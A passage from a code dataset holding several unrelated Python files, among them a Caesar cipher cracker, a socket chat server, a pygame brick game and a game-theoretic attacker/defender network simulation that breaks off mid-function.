PositiveSentimentSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Slice of dataset which contains positive sentiment carrying words\n \"\"\"\n self.name = \"positive_sentiment\"\n self.positive_words_list = \"https://gist.githubusercontent.com/mkulakowski2/4289437/raw/1bb4d7f9ee82150f339f09b5b1a0e6823d633958/positive-words.txt\"\n\n def score_fn(self, batch, columns):\n pass\n\n def get_positive_words(self):\n response = requests.get(self.positive_words_list)\n _, words = (\n response.text.split(\"\\n\\n\")[0],\n response.text.split(\"\\n\\n\")[1],\n )\n word_list = words.split(\"\\n\")\n return word_list\n\n def get_subpops(self, spacy):\n return [\n HasAnyPhrase(\n phrase_groups=[self.get_positive_words()],\n identifiers=[Identifier(\"Positive Sentiment Words\")],\n )\n ]\n\n\n@register_lbtsubpop(\"negative_sentiment\")\nclass NegativeSentimentSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Slice of dataset which contains negative sentiment carrying words\n \"\"\"\n self.name = \"positive_sentiment\"\n self.negative_words_list = \"https://gist.githubusercontent.com/mkulakowski2/4289441/raw/dad8b64b307cd6df8068a379079becbb3f91101a/negative-words.txt\"\n\n def score_fn(self, batch, columns):\n pass\n\n def get_negative_words(self):\n response = requests.get(self.negative_words_list)\n _, words = (\n response.text.split(\"\\n\\n\")[0],\n response.text.split(\"\\n\\n\")[1],\n )\n word_list = words.split(\"\\n\")\n return word_list\n\n def get_subpops(self, spacy):\n return [\n HasAnyPhrase(\n phrase_groups=[self.get_negative_words()],\n identifiers=[Identifier(\"Negative Sentiment Words\")],\n )\n ]\n\n\n@register_lbtsubpop(\"naughty_and_obscene\")\nclass NaughtyObsceneSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Slice of dataset which contains naught + obscene words\n \"\"\"\n self.name = \"naughty_and_obscene\"\n self.word_list = \"https://raw.githubusercontent.com/LDNOOBW/List-of-Dirty-Naughty-Obscene-and-Otherwise-Bad-Words/master/en\"\n\n def score_fn(self, batch, columns):\n pass\n\n def get_naughty_obscene_word_list(self):\n response = requests.get(self.word_list)\n return response.text.split(\"\\n\")\n\n def get_subpops(self, spacy):\n return [\n HasAnyPhrase(\n phrase_groups=[self.get_naughty_obscene_word_list()],\n identifiers=[Identifier(\"Naughty and Obscene Words\")],\n )\n ]\n\n\n@register_lbtsubpop(\"sentence_length\")\nclass SentenceLengthSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Sentence length based slices\n \"\"\"\n self.name = \"sentence_length\"\n\n def score_fn(self, batch, columns):\n pass\n\n def get_subpops(self, spacy):\n return [\n LengthSubpopulation(\n intervals=[\n (0, 20),\n (20, 40),\n (40, 60),\n (60, 80),\n (80, 100),\n (100, 120),\n (120, 140),\n ]\n )\n ]\n","repo_name":"HazyResearch/ludwig-benchmarking-toolkit","sub_path":"lbt/tools/robustnessgym/lbt_subpopulations.py","file_name":"lbt_subpopulations.py","file_ext":"py","file_size_in_byte":11113,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"18632283630","text":"import re\nimport Corpus\nimport nltk\n\ndef encrypt(string:str ,key: int) -> str:\n cipher = ''\n for char in string:\n new_char = char \n if new_char.isalpha():\n shift = 97 if char.islower() else 65\n new_char = chr((ord(char) + key - shift) % 26 + shift)\n cipher+=new_char\n return cipher\n\ndef decrypt(string:str , key:int) -> str:\n return encrypt(string , key*-1)\n\ndef crack(string:str)-> str:\n success_cracked= \"\"\n max_percentage = 50\n \n for key in range (0,26):\n # nltk.download('words')\n word_list = nltk.corpus.words.words()\n decrypted = decrypt(string,key)\n words = decrypted.split()\n english_count = 0\n for word in words:\n cleaned_word = re.sub(r\"[^a-zA-Z]+\", \"\", word).lower()\n if cleaned_word in word_list:\n english_count+=1\n \n english_percentage = int(english_count / len(words) * 100)\n if english_percentage > max_percentage:\n max_percentage = english_percentage\n success_cracked = decrypted\n \n return success_cracked\n \n\nif __name__ == \"__main__\":\n print(encrypt('Wow a dark and stormy night.', 3))\n print(decrypt('Zrz d gdun dqg vwrupb qljkw.',3))\n print(crack('Zrz d gdun dqg vwrupb qljkw.'))","repo_name":"mhn998/caesar-cipher","sub_path":"caesar_cipher/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8798127829","text":"class scc_graph:\n \n def __init__(self, N):\n self.N = N\n self.edges = []\n \n def csr(self):\n self.start = [0]*(self.N+1)\n self.elist = [0]*len(self.edges)\n for e in self.edges:\n self.start[e[0]+1] += 1\n for i in range(1, self.N+1):\n self.start[i] += self.start[i-1]\n counter = self.start[:]\n for e in self.edges:\n self.elist[counter[e[0]]] = e[1]\n counter[e[0]] += 1\n \n def add_edge(self, v, w):\n self.edges.append((v, w))\n \n def scc_ids(self):\n self.csr()\n N = self.N\n now_ord = group_num = 0\n visited = []\n low = [0]*N\n order = [-1]*N\n ids = [0]*N\n parent = [-1]*N\n stack = []\n for i in range(N):\n if order[i] == -1:\n stack.append(i)\n stack.append(i)\n while stack:\n v = stack.pop()\n if order[v] == -1:\n low[v] = order[v] = now_ord\n now_ord += 1\n visited.append(v)\n for i in range(self.start[v], self.start[v+1]):\n to = self.elist[i]\n if order[to] == -1:\n stack.append(to)\n stack.append(to)\n parent[to] = v\n else:\n low[v] = min(low[v], order[to])\n else:\n if low[v] == order[v]:\n while True:\n u = visited.pop()\n order[u] = N\n ids[u] = group_num\n if u == v:\n break\n group_num += 1\n if parent[v] != -1:\n low[parent[v]] = min(low[parent[v]], low[v])\n for i, x in enumerate(ids):\n ids[i] = group_num-1-x\n \n return group_num, ids\n #グループ数と、グループ番号を要素にしたリストを返す\n #グループ番号は、小さいほうが上位になっている。\n #つまり、グループ番号が大きいほうから小さいほうへは行けない\n #ループに入っていないものは単体のグループになる\n \n def scc(self): #強連結成分のリストを要素にもつリストを返す\n group_num, ids = self.scc_ids()\n groups = [[] for _ in range(group_num)]\n for i, x in enumerate(ids):\n groups[x].append(i)\n return groups\n\nimport sys,random,bisect\nfrom collections import deque,defaultdict\nfrom heapq import heapify,heappop,heappush\nfrom itertools import permutations\nfrom math import gcd,log\n\ninput = lambda :sys.stdin.readline().rstrip()\nmi = lambda :map(int,input().split())\nli = lambda :list(mi())\n\nN,M = mi()\nG = scc_graph(N)\nE = []\nfor _ in range(M):\n u,v = mi()\n E.append((u-1,v-1))\n G.add_edge(u-1,v-1)\n\nn,ids = G.scc_ids()\nedge = [[] for v in range(n)]\nfor u,v in E:\n if ids[u]==ids[v]:\n continue\n edge[ids[u]].append(ids[v])\n\ncnt = [0] * n\nfor v in range(N):\n cnt[ids[v]] += 1\n\ncheck = [False] * n\nres = 0\nfor i in range(n)[::-1]:\n if cnt[i] > 1:\n check[i] = True\n for nv in edge[i]:\n check[i] |= check[nv]\n if check[i]:\n res += cnt[i]\n\nprint(res)\n\n\n","repo_name":"shimamura10/Atcoder","sub_path":"過去問/ABC245/f_scc.py","file_name":"f_scc.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6570568485","text":"from unittest import TestCase\n\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom cnn.convmodel import ConvModel\nfrom cnn.convneuralblock import ConvNeuralBlock\nfrom cnn.deconvneuralblock import DeConvNeuralBlock\nfrom cnn.deconvmodel import DeConvModel\nfrom nnet.hyperparams import HyperParams\nfrom autoencoder.convvaemodel import ConvVAEModel\nfrom autoencoder.convvae import ConvVAE\nfrom autoencoder.variationalneuralblock import VariationalNeuralBlock\n\n\nclass TestConvVAE(TestCase):\n def test_train_and_eval(self):\n try:\n input_channels = 1 # Gray colors 1 feature\n in_channels = 5\n output_channels = 10 # 10 digits => 10 features/classes\n conv_2d_model = TestConvVAE.__create_2d_conv_model(\"Conv2d\", input_channels, in_channels, output_channels)\n\n latent_size = 16\n fc_hidden_dim = 22\n flatten_input = 90\n variational_block = VariationalNeuralBlock(flatten_input, fc_hidden_dim, latent_size)\n\n de_conv_2d_model = TestConvVAE.__create_de_2d_conv_model('DeConv2d', output_channels, in_channels, input_channels)\n conv_vae_model = ConvVAEModel('Conv LinearVAE', conv_2d_model, de_conv_2d_model, variational_block)\n\n lr = 0.001\n momentum = 0.9\n epochs = 20\n optim_label = 'adam'\n batch_size = 14\n early_stop_patience = 3\n loss_function = torch.nn.BCELoss(reduction='sum')\n hyper_params = HyperParams(lr, momentum, epochs, optim_label, batch_size, early_stop_patience, loss_function)\n\n # Step 3: Load data set\n train_loader, test_loader = TestConvVAE.__load_data(batch_size)\n conv_vae = ConvVAE(conv_vae_model, hyper_params, None)\n print(repr(conv_vae))\n conv_vae._train_and_eval(train_loader, test_loader)\n except Exception as e:\n self.fail(str(e))\n\n # -------------- Supporting methods -------------------\n\n @staticmethod\n def __create_2d_conv_model(model_id: str, input_channels: int, in_channels: int, output_channels: int) -> ConvModel:\n conv_neural_block_1 = TestConvVAE.__create_2d_conv_block(\n 2,\n input_channels,\n in_channels,\n torch.nn.LeakyReLU(0.2),\n False,\n 0)\n conv_neural_block_2 = TestConvVAE.__create_2d_conv_block(\n 2,\n in_channels,\n in_channels*2,\n torch.nn.LeakyReLU(0.2),\n False,\n 1)\n conv_neural_block_3 = TestConvVAE.__create_2d_conv_block(\n 2,\n in_channels*2,\n output_channels,\n torch.nn.LeakyReLU(0.2),\n False,\n 1)\n return ConvModel(\n model_id,\n 2,\n [conv_neural_block_1, conv_neural_block_2, conv_neural_block_3],\n None)\n\n @staticmethod\n def __create_2d_conv_block(\n dim: int,\n in_channels: int,\n out_channels: int,\n activation: torch.nn.Module,\n batch_norm: bool,\n padding: int) -> ConvNeuralBlock:\n kernel_size = 4\n max_pooling_kernel = -1\n bias = False\n flatten = False\n stride = 2\n return ConvNeuralBlock(\n dim,\n in_channels,\n out_channels,\n kernel_size,\n stride,\n padding,\n batch_norm,\n max_pooling_kernel,\n activation,\n bias,\n flatten)\n\n @staticmethod\n def __create_de_2d_conv_model(model_id: str, in_channels: int, hidden_dim: int, output_size: int) -> DeConvModel:\n de_conv_neural_block_1 = TestConvVAE.__create_2d_de_conv_block(\n 2,\n in_channels,\n hidden_dim * 4,\n torch.nn.ReLU(),\n False,\n 0)\n de_conv_neural_block_2 = TestConvVAE.__create_2d_de_conv_block(\n 2,\n hidden_dim * 4,\n hidden_dim*2,\n torch.nn.ReLU(),\n False,\n 1)\n de_conv_neural_block_3 = TestConvVAE.__create_2d_de_conv_block(\n 2,\n hidden_dim*2,\n output_size,\n torch.nn.Sigmoid(),\n False,\n 1)\n return DeConvModel(model_id, 2, [de_conv_neural_block_1, de_conv_neural_block_2, de_conv_neural_block_3])\n\n @staticmethod\n def __create_2d_de_conv_block(\n dim: int,\n in_channels: int,\n out_channels: int,\n activation: torch.nn.Module,\n batch_norm: bool,\n padding: int) -> DeConvNeuralBlock:\n\n kernel_size = 4\n bias = False\n stride = 2\n return DeConvNeuralBlock(\n dim,\n in_channels,\n out_channels,\n kernel_size,\n stride,\n padding,\n batch_norm,\n activation,\n bias)\n\n @staticmethod\n def __load_data(batch_size: int) -> (DataLoader, DataLoader):\n transform = transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,)),\n ])\n train_loader = DataLoader(\n MNIST('../../data/', train=True, download=True, transform=transform),\n batch_size=batch_size,\n shuffle=True)\n test_loader = DataLoader(\n MNIST('../../data/', train=False, download=True, transform=transform),\n batch_size=batch_size,\n shuffle=False)\n return train_loader, test_loader\n\n","repo_name":"patrick-nicolas/GenModels","sub_path":"src/autoencoder/test/test_convvae.py","file_name":"test_convvae.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73461466728","text":"def digits2letters(digits):\r\n digits = str(digits)\r\n def loopProcessing(index, string, result):\r\n if index == len(digits):\r\n result.append(string)\r\n return\r\n for letter in dict[digits[index]]:\r\n loopProcessing(index+1, string+letter, result)\r\n\r\n dict = {'0':[''],\r\n '1':[''],\r\n '2':['a','b','c'],\r\n '3':['d','e','f'],\r\n '4':['g','h','i'],\r\n '5':['j','k','l'],\r\n '6':['m','n','o'],\r\n '7':['p','q','r','s'],\r\n '8':['t','u','v'],\r\n '9':['w','x','y','z']\r\n }\r\n result = []\r\n loopProcessing(0, '', result)\r\n print(\"Possible letters are:\", result)\r\n return result\r\n\r\ndigits = input(\"Input your digits to convert to letters: \")\r\nwhile True:\r\n if digits.isdigit():\r\n break\r\n else:\r\n digits = input(\"Please input only digits: \")\r\n\r\ndigits2letters(digits)","repo_name":"patrickhohoho/assignments","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6064891465","text":"import socket\nimport select\n\n#select 监听 读 写 错误 所有事件\n\nss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nprint('初始化----------')\n\nss.bind(('10.2.0.104',12332))\n\nss.listen(10)\n\nreadlist =[ss]\nwritelist = []\n\nmsg_dict ={}\nconn_list = [] #存放所有conn链接\nmsg_dict_code = {} #存放消息\n# conn,addr = ss.accept()\nwhile True: #让其一直循环监听\n rlist,wlist,xlist = select.select(readlist,writelist,[])\n\n #监听readlist列表中的事件ss的读 只要右边的readlist读 有事件发生就会向下执行 可监听readlist列表中的所有元素\n #rlist 中只会存在本次 readlist中有事件发生的已经准备好的事件\n #只要rlist wlist xlist中任何一个存在值就会向下执行\n\n for r in rlist:\n if r is ss:\n conn,addr = r.accept()\n conn_list.append(conn)\n readlist.append(conn) #添加事件conn到读事件列表中去,使读能监听ss和conn这两个事件\n\n else:\n msg = r.recv(1024)\n # msg_dict[r.fileno()] = msg #将消息内容放入字典中 只存了这一个的消息\n if len(msg) == 0:\n r.close()\n readlist.remove(r) #若客户端断开链接 则不再监听该conn\n conn_list.remove(r)\n print('{}-----{}'.format(r.fileno(),msg.decode()))\n\n msg = \"编号:{} 信息内容: {}\".format(r.fileno(),msg.decode())\n\n\n for i in conn_list:\n writelist.append(i) #将所有conn放入写监听中\n msg_dict_code[i.fileno()] = msg #将所有相对应的消息存入\n\n for w in wlist:\n msg = msg_dict_code[w.fileno()]\n w.send(msg.encode()) #有写事件发生则发送收到的消息\n del msg_dict_code[w.fileno()] #删除该编号记录的信息\n writelist.remove(w) #将该w事件从监听中移除 不然会一直发送\n","repo_name":"JwangTec/python_resources","sub_path":"python_socket/select1.py","file_name":"select1.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21550204598","text":"import pygame\r\n\r\nglobal screen\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255,255,0)\r\nscreen = None\r\ndef init(scree):\r\n\t\tglobal screen\r\n\t\tscreen = scree\r\n\t\t\r\ndef retangle(rect,color):\r\n\tpygame.draw.rect(screen,color,rect)\r\ndef cirсle(x,y):\r\n\tpygame.draw.circle(screen,WHITE,(x,y),4)\r\n\r\nclass platform():\r\n\tx = 0\r\n\ty = 0\r\n\trect = None\r\n\tdef __init__(self,x,y) -> None:\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.rect = pygame.Rect(x-30,y-2,60,4)\r\n\tdef draw(self):\r\n\t\tretangle(self.rect,(255, 255, 255))\r\n\tdef move(self,pos):\r\n\t\tx = pos[0]\r\n\t\ty = self.y\r\n\t\tself.rect = pygame.Rect(x-30,y-2,60,4)\r\n\r\nclass wall():\r\n\tx,y =0,0\r\n\trect = None\r\n\tdef __init__(self,x,y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.rect = pygame.Rect((self.x,self.y),(10,10))\r\n\tdef draw(self):\r\n\t\tpygame.draw.rect(screen,WHITE,self.rect)\r\nclass ball():\r\n\tx,y = 0,0\r\n\trect = None\r\n\tvector = (0.5,-1)\r\n\tdef __init__(self,x,y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.rect = pygame.Rect(self.x,self.y,8,8)\r\n\tdef move(self):\r\n\t\tself.x += self.vector[0]\r\n\t\tself.y += self.vector[1]\r\n\t\tself.rect = pygame.Rect(self.x-4,self.y-4,8,8)\r\n\tdef check_b(self, blocksc):\r\n\t\tblocks = blocksc.copy()\r\n\t\tfor block in blocks:\r\n\t\t\twx = block.rect.x\r\n\t\t\twy = block.rect.y\r\n\t\t\tww = block.rect.width\r\n\t\t\twh = block.rect.height\r\n\t\t\tbx = self.rect.x\r\n\t\t\tby = self.rect.y\r\n\t\t\tif pygame.Rect(wx,wy,1,wh).colliderect(pygame.Rect(bx + 7,by,1,8)) or pygame.Rect(wx+ww-1,wy,1,wh).colliderect(pygame.Rect(bx,by,1,8)):\r\n\t\t\t\tself.vector = (0 - self.vector[0],self.vector[1])\r\n\t\t\t\tblocksc.remove(block)\r\n\r\n\t\t\tif pygame.Rect(wx,wy + wh-1,ww,1).colliderect(pygame.Rect(bx,by,8,1)) or pygame.Rect(wx,wy,ww,1).colliderect(pygame.Rect(bx,by + 7,8,1)):\r\n\t\t\t\tself.vector = (self.vector[0],0 - self.vector[1])\r\n\t\t\t\tblocksc.remove(block)\r\n\r\n\r\n\t\treturn blocksc\r\n\t\t\t\t\r\n\tdef check_w(self,blocks):\r\n\t\tbx = self.rect.x\r\n\t\tby = self.rect.y\r\n\t\tfor block in blocks:\r\n\t\t\twx = block.rect.x\r\n\t\t\twy = block.rect.y\r\n\t\t\tww = block.rect.width\r\n\t\t\twh = block.rect.height\r\n\r\n\t\t\tif pygame.Rect(wx+ww-1,wy,1,wh).colliderect(pygame.Rect(bx,by,1,8)) or pygame.Rect(wx,wy,1,wh).colliderect(pygame.Rect(bx + 7,by,1,8)):\r\n\t\t\t\tself.vector = (0 - self.vector[0],self.vector[1])\r\n\t\t\t\r\n\t\t\tif pygame.Rect(wx,wy,ww,1).colliderect(pygame.Rect(bx,by + 7,8,1)) or pygame.Rect(wx,wy + wh-1,ww,1).colliderect(pygame.Rect(bx,by,8,1)):\r\n\t\t\t\tself.vector = (self.vector[0],0 - self.vector[1])\r\n\t\t\r\n\t\tif pygame.Rect(500,0,1,500).colliderect(pygame.Rect(bx + 7,by,1,8)) or pygame.Rect(0,0,1,500).colliderect(pygame.Rect(bx,by,1,8)):\r\n\t\t\t\tself.vector = (0 - self.vector[0],self.vector[1])\r\n\r\n\t\tif pygame.Rect(0,0,500,1).colliderect(pygame.Rect(bx,by,8,1)):\r\n\t\t\tself.vector = (self.vector[0],0 - self.vector[1])\r\n\r\n\t\tif pygame.Rect(0,500,500,1).colliderect(pygame.Rect(bx,by + 7,8,1)):\r\n\t\t\tpygame.quit()\r\n\r\n\r\n\r\n\tdef reverse(self):\r\n\t\tself.vector = (self.vector[0],0-self.vector[1])\r\n\tdef draw(self):\r\n\t\tcirсle(self.x,self.y)\r\n\t\t\r\nclass block():\r\n\tx,y =0,0\r\n\trect = None\r\n\trect_obv = None\r\n\tdef __init__(self,x,y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.rect = pygame.Rect(self.x,self.y,10,10)\r\n\t\tself.rect_obv = pygame.Rect(self.x,self.y,9,9)\r\n\tdef draw(self):\r\n\t\tpygame.draw.rect(screen,BLACK,self.rect_obv)\r\n\t\tpygame.draw.rect(screen,GREEN,self.rect)","repo_name":"LightMizu/Arconoid","sub_path":"game/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34841389684","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n# # solve Jupyter runtime error\n# import nest_asyncio\n# nest_asyncio.apply()\n\n\nimport concurrent.futures\nimport multiprocessing\nimport os\n\nimport matplotlib.pyplot as plt\nfrom networkx import nx\nimport numpy as np\nfrom itertools import count\nimport random\nimport math\nimport copy\nimport time\nimport pickle\n\nfrom graph_function import *\nfrom attacker_function import *\nfrom defender_function import *\nfrom main import display\n\n\nclass game_class:\n def __init__(self, simulation_id, DD_using, uncertain_scheme, web_data_upper_vul, Iot_upper_vul, Th_risk, _lambda,\n mu, SF_thres_1, SF_thres_2, att_detect_UpBod):\n self.lifetime = 1\n self.CKC_number = 6\n self.strategy_number = 8\n self.DD_using = DD_using\n self.graph = graph_class(web_data_upper_vul, Iot_upper_vul)\n self.uncertain_scheme = uncertain_scheme\n self.att_detect_UpBod = att_detect_UpBod\n self.attacker = attacker_class(self, self.uncertain_scheme, self.att_detect_UpBod)\n self.attacker_number = 1\n self.defender = defender_class(self, self.uncertain_scheme)\n self.game_over = False\n self.FN = 10 # False Negative for Beta distribution\n self.TP = 90 # True Positive\n self.TN = 99\n self.FP = 1\n self.rewire_network = 0.01\n # for Experiment Result ⬇️\n self.def_uncertainty_history = []\n self.att_uncertainty_history = []\n self.pre_attacker_number = 0\n self.att_HEU_history = []\n self.def_HEU_history = []\n self.att_strategy_counter = []\n self.def_strategy_counter = []\n self.FPR_history = []\n self.TPR_history = []\n self.att_cost_history = []\n self.def_cost_history = []\n self.def_per_strat_cost = np.zeros((1,8))\n self.def_succ_counter = np.zeros((6,8))\n self.def_fail_counter = np.zeros((6,8))\n self.criticality_hisotry = np.zeros(100000) # np.zeros(10000)\n self.evict_reason_history = np.zeros(2)\n self.SysFail = [False] * 3\n self.att_EU_C = np.zeros(8)\n self.att_EU_CMS = np.zeros(8)\n self.def_EU_C = np.zeros(8)\n self.def_EU_CMS = np.zeros(8)\n self.att_impact = np.zeros(8)\n self.def_impact = np.zeros(8)\n self.att_HEU_DD_IPI = np.zeros(8)\n self.def_HEU_DD_IPI = np.zeros(8)\n self.NIDS_eviction = np.zeros(4) # [# of bad, # of good]\n self.NIDS_Th_risk = Th_risk\n self._lambda = _lambda\n self.mu = mu\n self.SF_thres_1 = SF_thres_1\n self.SF_thres_2 = SF_thres_2\n self.hitting_result = []\n\n def attacker_round(self, simulation_id):\n if display: print(f\"attacker location{self.attacker.location}\")\n if self.game_over:\n print(f\"Sim {simulation_id} GAME OVER\")\n return\n\n self.attacker.observe_opponent(self.defender.CKC_position,\n self.defender.chosen_strategy)\n\n self.attacker.choose_strategy(self.defender.strategy_number,\n self.defender.strat_cost,\n self.defender.impact_record)\n if display:\n print(f\"attacker choose: {self.attacker.chosen_strategy + 1}\")\n attack_result = self.attacker.execute_strategy(\n self.graph.network, self.defender.network, self.defender.P_fake,\n self.attacker.detect_prob)\n self.attacker.update_attribute(self.defender.dec, self._lambda)\n self.graph.update_graph(self.defender.network, self.attacker.network)\n if attack_result:\n self.def_succ_counter[self.attacker.CKC_position, self.defender.chosen_strategy] += 1\n else:\n self.def_fail_counter[self.attacker.CKC_position, self.defender.chosen_strategy] += 1\n if attack_result:\n if (self.attacker.chosen_strategy == 0\n and self.attacker.CKC_position != 0):\n pass # This avoid inside attacker increase stage when Strategy 1 success\n else:\n self.attacker.next_stage()\n else:\n self.attacker.random_moving()\n if display:\n print(f\"attacker move, new location: {self.attacker.location}\")\n\n return attack_result\n\n def defender_round(self):\n self.defender.observe_opponent(self.attacker.impact_record,\n self.attacker.CKC_position,\n self.attacker.chosen_strategy)\n result = self.defender.decide_CKC_posi(self.attacker.detect_prob,\n self.attacker.CKC_position)\n if result:\n if display:\n print(\"defender guess CKC correct\")\n else:\n if display:\n print(\"defender guess CKC wrong\")\n\n self.defender.choose_strategy(self.attacker.chosen_strategy,\n self.attacker.strategy_number,\n self.attacker.strat_cost,\n self.attacker.impact_record)\n if display:\n print(f\"defender choose: {self.defender.chosen_strategy + 1}\")\n success = self.defender.execute_strategy(self.attacker.network,\n self.attacker.detect_prob,\n self.graph,\n self.FN / (self.TP + self.FN),\n self.FP / (self.TN + self.FP), self.NIDS_eviction)\n self.defender.update_attribute(self.attacker.detect_prob, self.mu, self.attacker.impact_record)\n self.graph.update_graph(self.defender.network, self.attacker.network)\n\n def NIDS_detect(self):\n # Warning: False Positive evict too many nodes\n # false negative rate\n false_neg_prob = self.FN / (self.TP + self.FN)\n false_pos_prob = self.FP / (self.TN + self.FP)\n Th_risk = self.NIDS_Th_risk\n\n # for index in self.graph.network.nodes:\n all_nodes = list(self.graph.network.nodes(data=False))\n experiment_index_record = 0\n for index in all_nodes:\n if is_node_evicted(self.graph.network,\n index): # ignore evicted node for saving time\n continue\n\n # detect is node compromised\n node_is_compromised = False\n if self.graph.network.has_node(index):\n if self.graph.network.nodes[index][\"compromised_status\"]:\n if random.random() > false_neg_prob:\n node_is_compromised = True\n self.defender.network.nodes[index][\"compromised_status\"] = True\n experiment_index_record = 0\n else:\n if display: print(\"False Negative to compromised node\")\n else:\n if random.random() < false_pos_prob:\n if display: print(\"False Positive to good node\")\n node_is_compromised = True\n self.defender.network.nodes[index][\"compromised_status\"] = True\n experiment_index_record = 1\n\n if node_is_compromised:\n # No-DD means NIDS doesn't remain attacker in system\n if not self.DD_using:\n if display: print(f\"Evict node {index}, No DD using\")\n evict_a_node(index, self.graph.network,\n self.defender.network, self.attacker.network)\n self.NIDS_eviction[experiment_index_record] += 1\n continue\n if self.graph.network.has_node(index):\n if self.graph.network.nodes[index][\"criticality\"] > Th_risk:\n if display:\n print(f\"Evict node {index}, criticality > Th_risk\")\n evict_a_node(index, self.graph.network,\n self.defender.network,\n self.attacker.network)\n self.NIDS_eviction[experiment_index_record] += 1\n continue\n else:\n if is_system_fail(self.graph, [None], self.SF_thres_1, self.SF_thres_2):\n if display:\n print(\n f\"Evict node {index}, compromise cause SF\")\n evict_a_node(index, self.graph.network,\n self.defender.network,\n self.attacker.network)\n self.NIDS_eviction[experiment_index_record] += 1\n\n def update_graph(self):\n self.graph.update_graph()\n self.attacker.update_graph()\n self.defender.update_graph()\n\n def prepare_for_next_game(self):\n self.lifetime += 1\n\n # Beta distribution\n if self.graph.using_honeynet:\n self.TP += 5\n self.TN += 5\n\n else:\n if self.defender.chosen_strategy == 4 or self.defender.chosen_strategy == 5 or self.defender.chosen_strategy == 6 or self.defender.chosen_strategy == 7:\n self.TP += 5\n self.TN += 5\n\n # rewire graph\n rewire_network(self.graph.network, self.attacker.network,\n self.defender.network, self.rewire_network)\n\n # reconnect non-evicted node to server or databse\n node_reconnect(self.graph.network, self.attacker.network,\n self.defender.network, self.graph.connect_prob)\n\n # update defender impact\n self.defender.impact_record[\n self.defender.chosen_strategy] = 1 - self.attacker.impact_record[\n self.attacker.chosen_strategy]\n\n # clean honeypot after each game\n if self.graph.using_honeynet:\n clean_honeynet(self.graph.network, self.attacker.network,\n self.defender.network)\n self.graph.using_honeynet = False\n\n # remove honeypot in comrpomised list\n for index in self.attacker.compromised_nodes:\n if not self.graph.network.has_node(index):\n self.attacker.compromised_nodes.remove(index)\n # remove honeypot in collection list\n for index in self.attacker.collection_list:\n if not self.graph.network.has_node(index):\n self.attacker.collection_list.remove(index)\n\n def new_attacker(self, simulation_id):\n self.attacker_number += 1\n print(\n f\"\\033[93m Sim {simulation_id} Creating attacker #{self.attacker_number} \\033[0m\"\n )\n # new attacker\n self.attacker = attacker_class(self, self.uncertain_scheme, self.att_detect_UpBod)\n # reset defender\n self.defender.reset_attribute(self.attacker.impact_record,\n self.CKC_number)\n\n def experiment_saving(self):\n self.def_uncertainty_history.append(self.defender.uncertainty)\n self.att_uncertainty_history.append(self.attacker.uncertainty)\n\n # Att/Def HEU\n self.att_HEU_history.append(\n self.attacker.HEU[self.attacker.chosen_strategy])\n self.def_HEU_history.append(\n self.defender.HEU[self.defender.chosen_strategy])\n # Att/Def Strategy\n self.att_strategy_counter.append(self.attacker.chosen_strategy)\n self.def_strategy_counter.append(self.defender.chosen_strategy)\n # FP & TP for ROC curve\n self.FPR_history.append(1 - self.TN /\n (self.TN + self.FP)) # FPR using preset value\n self.TPR_history.append(1 - self.FN / (self.FN + self.TP))\n # Att/Def Cost\n self.att_cost_history.append(\n self.attacker.strat_cost[self.attacker.chosen_strategy])\n self.def_cost_history.append(\n self.defender.strat_cost[self.defender.chosen_strategy])\n def_cost_temp = np.zeros(8)\n def_cost_temp[self.defender.chosen_strategy] = self.defender.strat_cost[self.defender.chosen_strategy]\n\n self.def_per_strat_cost = np.append(self.def_per_strat_cost, np.reshape(def_cost_temp, (1, -1)), axis=0)\n\n\n # Criticality\n criti_list = (np.array(\n list(\n nx.get_node_attributes(self.graph.network,\n \"criticality\").values())) *\n 1000).astype(int)\n for value in criti_list:\n self.criticality_hisotry[value] += 1\n # EU_C & EU_CMS\n self.att_EU_C = np.vstack((self.att_EU_C, self.attacker.EU_C))\n self.att_EU_CMS = np.vstack((self.att_EU_CMS, self.attacker.EU_CMS))\n self.def_EU_C = np.vstack((self.def_EU_C, self.defender.EU_C))\n self.def_EU_CMS = np.vstack((self.def_EU_CMS, self.defender.EU_CMS))\n # attacker/defender impact\n self.att_impact = np.vstack(\n (self.att_impact, self.attacker.impact_record))\n self.def_impact = np.vstack(\n (self.def_impact, self.defender.impact_record))\n # HEU in DD IPI\n self.att_HEU_DD_IPI = np.vstack(\n (self.att_HEU_DD_IPI, self.attacker.HEU))\n self.def_HEU_DD_IPI = np.vstack(\n (self.def_HEU_DD_IPI, self.defender.HEU))\n\n # Hitting Ratio\n hit = False\n att_AHEU_str_index = 